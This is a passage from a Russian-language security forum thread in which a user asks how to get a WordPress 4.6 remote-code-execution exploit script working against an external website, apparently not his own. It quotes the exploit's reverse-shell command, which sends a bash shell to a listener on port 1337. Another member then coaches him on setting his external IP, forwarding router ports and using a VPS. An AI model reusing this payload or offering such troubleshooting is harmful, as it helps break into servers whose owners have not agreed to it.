• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Помогите с эксплуатацией эксплойта

CryNet

Member
23.09.2020
11
0
BIT
0
Хочу проэксплуатировать WP 4.6 Remote Code Execution.
Сам сплойт: .
Есть сайт нужной версии, в системе есть netcat.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу в консоли какой-то HTML и просто всё подвисает, нет сообщения о неудачное эксплуатации и т.д. А рядом создаётся файл rce.txt с содержимым:
(sleep 3s && nohup bash -i >/dev/tcp/192.168.57.1/1337 0<&1 2>&1) &

Что я делаю не так и как правильно проэксплуатировать

Ага! Среди кучи HTML-я заметил это:
  • Listening on 0.0.0.0 1337
В скрипте я вписал свой IP rev_host="192.168.0.4", именно этот адресс указан в веб-морде роутера
 
Последнее редактирование:

Pernat1y

Red Team
05.04.2018
1 443
135
BIT
0
Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.
 

CryNet

Member
23.09.2020
11
0
BIT
0
Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.
Да. Сайт не из моей локали
 

CryNet

Member
23.09.2020
11
0
BIT
0
пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337)
А не подскажите по пробросу, я просто никогда этого не делал... Как правильно это сделать?
У меня сейчас так:

Порт сервиса
IP-адресВнутренний портПротоколСостояниеИзменить
1337192.168.0.41337TCP или UDPВключеноИзменить
Я на правильном пути? :)
 

Pernat1y

Red Team
05.04.2018
1 443
135
BIT
0
Я на правильном пути? :)
Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.
 

CryNet

Member
23.09.2020
11
0
BIT
0
Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.
А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.
 

Pernat1y

Red Team
05.04.2018
1 443
135
BIT
0
А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.
Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.
 

CryNet

Member
23.09.2020
11
0
BIT
0
Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.
Не-е-е... та же ошибка...
Код:
Warning: Inverse name lookup failed for `0.0.5.57'
Listening on any address 43069

Сейчас проброс выглядит так:
Порт сервисаIP-адресВнутренний портПротоколСостояниеИзменить
1337192.168.0.41337TCP или UDPВключеноИзменить
81192.168.0.481TCP или UDPВключеноИзменить
 

CryNet

Member
23.09.2020
11
0
BIT
0
Покажи полный скрипт, с какими параметрами запускается и полный вывод.
Сайт и свой айпишник можно не светить :)
Скрипт:
Запуск: ./wordpress-rce-exploit.sh site.info
Вывод:

Мне кажеться тут ещё дело в том, что на одном IP несколько сайтов. Например при запуска аналогичного эксплойта в Метасплойте (он там, кстати, тоже есть), последний выдаёт ошибку выводя IP-адресс моего таргета и спрашивая "тут точно установлен WordPress?". Ну а перейдя по IP выводится заглушка хостера. Хотя я в RHOST указал именно адресс сайта, а не его IP.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!